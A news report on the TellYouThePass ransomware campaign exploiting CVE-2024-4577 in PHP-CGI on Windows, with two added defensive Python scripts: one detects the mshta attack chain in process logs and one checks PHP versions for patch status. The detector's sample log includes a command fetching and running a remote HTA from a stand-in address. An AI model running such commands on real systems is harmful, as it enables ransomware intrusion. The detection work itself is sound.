TellYouThePass ransomware campaign abuses PHP RCE bugs

June 19, 2024

The TellYouThePass ransomware group leveraged the recently patched CVE-2024-4577 remote code execution vulnerability in PHP to deliver webshells and run the encryptor payload on targeted systems.

Based on reports, the campaign began earlier this month, shortly after PHP's maintainers released security patches and proof-of-concept exploit code became publicly available.

TellYouThePass was quick to capitalise on this window, as the group is notorious for exploiting newly published, widely reachable vulnerabilities within days of disclosure.

TellYouThePass uses a critical-severity vulnerability to execute arbitrary PHP code.

According to the investigation, the TellYouThePass campaign exploits CVE-2024-4577 to run arbitrary PHP code on the target. Researchers noted that the actors then use the Windows mshta.exe binary to launch a malicious HTML application (HTA) file.

The HTA contains VBScript with a base64-encoded string that decodes into a binary and loads a .NET ransomware variant directly into memory on the compromised host.

Upon execution, the malware sends an HTTP request disguised as a CSS resource request to its command-and-control (C2) server while encrypting files on the infected workstation. It then drops a ransom note, "READ_ME10.html," telling the victim how to pay to restore their files.
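The execution chain above (a CGI worker spawning a shell, mshta.exe launching a remote HTA, and the chain leading back to php-cgi.exe) is what a detection engineer would hunt for in process-creation telemetry. The following is an added example, not code from the original article or from any researcher it cites: it runs three detection rules over a constructed set of Sysmon-style Event ID 1 records (JSON field names such as `Image`, `ParentImage` and `CommandLine` are assumed; the host paths, PIDs and the 198.51.100.7 staging address are made up for the sample).

```python
"""Detect the php-cgi.exe -> cmd.exe -> mshta.exe chain in process-creation logs.

Added example, not the article's own code. Input is newline-delimited JSON
resembling Sysmon Event ID 1 (field names assumed); the sample below is
constructed, with TEST-NET addresses and invented PIDs.
"""
import json

# Processes that serve web requests; any of them spawning a script host is suspect.
WEB_WORKERS = {"php-cgi.exe", "php.exe", "httpd.exe", "w3wp.exe", "nginx.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed sample: three records form the attack chain, the last one is benign.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 2200,
     "Image": r"C:\php\php-cgi.exe", "ParentImage": r"C:\Apache24\bin\httpd.exe",
     "CommandLine": r"C:\php\php-cgi.exe"},
    {"EventID": 1, "ProcessId": 4120, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\php\php-cgi.exe",
     "CommandLine": r"cmd.exe /c mshta.exe http://198.51.100.7/dd3.hta"},
    {"EventID": 1, "ProcessId": 4130, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe http://198.51.100.7/dd3.hta"},
    {"EventID": 1, "ProcessId": 5000, "ParentProcessId": 800,
     "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\Desktop\report.hta"},
])


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_log(text):
    """Parse newline-delimited JSON process-creation records."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestors(records, pid):
    """Yield image basenames of pid's ancestors, nearest first, cycle-safe."""
    by_pid = {r["ProcessId"]: r for r in records}
    seen = set()
    cur = by_pid.get(pid)
    while cur and cur["ProcessId"] not in seen:
        seen.add(cur["ProcessId"])
        parent = by_pid.get(cur["ParentProcessId"])
        if parent is None:
            # Parent was not logged; fall back to the recorded ParentImage.
            yield _basename(cur["ParentImage"])
            return
        yield _basename(parent["Image"])
        cur = parent


def detect(records):
    """Return (rule_name, pid) findings for every record matching a rule."""
    findings = []
    for r in records:
        if r.get("EventID") != 1:
            continue
        image = _basename(r["Image"])
        parent = _basename(r["ParentImage"])
        cmd = r.get("CommandLine", "").lower()
        # Rule 1: a web/CGI worker spawning a shell or script host (webshell behaviour).
        if parent in WEB_WORKERS and image in SCRIPT_HOSTS:
            findings.append(("web_worker_spawns_script_host", r["ProcessId"]))
        # Rule 2: mshta.exe fetching its HTA over HTTP(S) rather than from disk.
        if image == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
            findings.append(("mshta_remote_hta", r["ProcessId"]))
        # Rule 3: mshta.exe anywhere beneath a web worker in the process tree,
        # which catches the chain even when an intermediate cmd.exe is present.
        if image == "mshta.exe" and any(
            a in WEB_WORKERS for a in ancestors(records, r["ProcessId"])
        ):
            findings.append(("mshta_under_web_worker", r["ProcessId"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(parse_log(SAMPLE_LOG)):
        print(f"{rule}: pid {pid}")
```

Rule 3 is the one worth keeping after the campaign fades: a tree walk from mshta.exe back to php-cgi.exe does not depend on the exact intermediate process, so it still fires if the actors swap cmd.exe for PowerShell. The benign desktop HTA in the sample matches none of the rules.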

TellYouThePass has claimed several victims since the start of the month; the ransom note observed in this campaign demanded 0.1 BTC (about $6,700) in exchange for the decryption key.

A separate researcher also found that the campaign had already compromised several websites.

CVE-2024-4577 is a critical RCE vulnerability affecting PHP installed on Windows, including the end-of-life 5.x, 7.x and 8.0 branches, when PHP runs in CGI mode. It stems from unsafe character-encoding conversions performed by Windows, which let an attacker smuggle command-line arguments into the php-cgi binary.

Researchers identified the vulnerability on May 7 and reported it to the PHP team, which released PHP 8.3.8, 8.2.20 and 8.1.29 to fix it. A proof-of-concept (PoC) exploit for CVE-2024-4577 was published a day after the patches.

The public PoC appears to have triggered a surge in exploitation attempts, with researchers observing scans and attacks on the same day it was released. Organisations still running affected versions, particularly Windows hosts exposing php-cgi, should update to the fixed releases without delay, since end-of-life branches will receive no patch at all.
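Working out which hosts are actually in scope is the first step of that update, and the article's version details are enough to script it. The following is an added example, not code from the article or from the PHP project: it parses the banner that `php-cgi.exe -v` prints (the sample banners below are constructed) and applies the fixed versions named above, treating any branch without a listed fix as end-of-life and therefore unpatched, which holds as of the article's date.

```python
"""Classify PHP CGI builds against the CVE-2024-4577 fixed releases.

Added example, not the article's own code. Fixed versions are those named in
the article; branches not listed (5.x, 7.x, 8.0) are treated as end-of-life
and permanently unpatched. Banners below are constructed sample input.
"""
import re

# Fixed releases per supported branch, as stated in the article.
FIXED = {(8, 3): (8, 3, 8), (8, 2): (8, 2, 20), (8, 1): (8, 1, 29)}
CGI_SAPIS = {"cgi", "cgi-fcgi"}

# Matches e.g. "PHP 8.2.19 (cgi-fcgi) (built: ...)" as printed by php-cgi.exe -v.
BANNER_RE = re.compile(r"^PHP (\d+)\.(\d+)\.(\d+)\S* \(([^)]+)\)")

# Constructed sample banners, one per host.
SAMPLE_BANNERS = {
    "web01": "PHP 8.2.19 (cgi-fcgi) (built: May  8 2024 10:03:22) (NTS Visual C++ 2019 x64)",
    "web02": "PHP 8.3.8 (cgi-fcgi) (built: Jun  4 2024 13:15:01) (NTS Visual C++ 2019 x64)",
    "legacy": "PHP 7.4.33 (cgi-fcgi) (built: Nov  2 2022 14:22:09) (NTS Visual C++ 2017 x64)",
    "build": "PHP 8.1.29 (cli) (built: Jun  4 2024 12:40:45) (NTS Visual C++ 2019 x64)",
}


def parse_banner(banner):
    """Return ((major, minor, patch), sapi) or raise ValueError on junk input."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        raise ValueError(f"unrecognised PHP banner: {banner!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))), m.group(4).lower()


def assess(banner, windows=True):
    """Classify one host: 'not-windows', 'not-cgi', 'patched' or 'unpatched'."""
    if not windows:
        return "not-windows"          # the bug is specific to Windows encoding conversions
    version, sapi = parse_banner(banner)
    if sapi not in CGI_SAPIS:
        return "not-cgi"              # mod_php / CLI builds are out of scope for this bug
    fixed = FIXED.get(version[:2])
    if fixed is None:
        return "unpatched"            # EOL branch: no fixed release exists
    return "patched" if version >= fixed else "unpatched"


def hosts_needing_patch(banners, windows=True):
    """Names of hosts whose PHP CGI build is still exposed to CVE-2024-4577."""
    return sorted(h for h, b in banners.items() if assess(b, windows) == "unpatched")


if __name__ == "__main__":
    for host, banner in SAMPLE_BANNERS.items():
        print(f"{host}: {assess(banner)}")
```

The `not-cgi` result deserves a caveat: it reflects only the SAPI that `php-cgi.exe -v` reports for that binary, so a host that also ships a php-cgi.exe reachable through a web server (the XAMPP-style layout) should be checked with that binary, not the CLI one.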
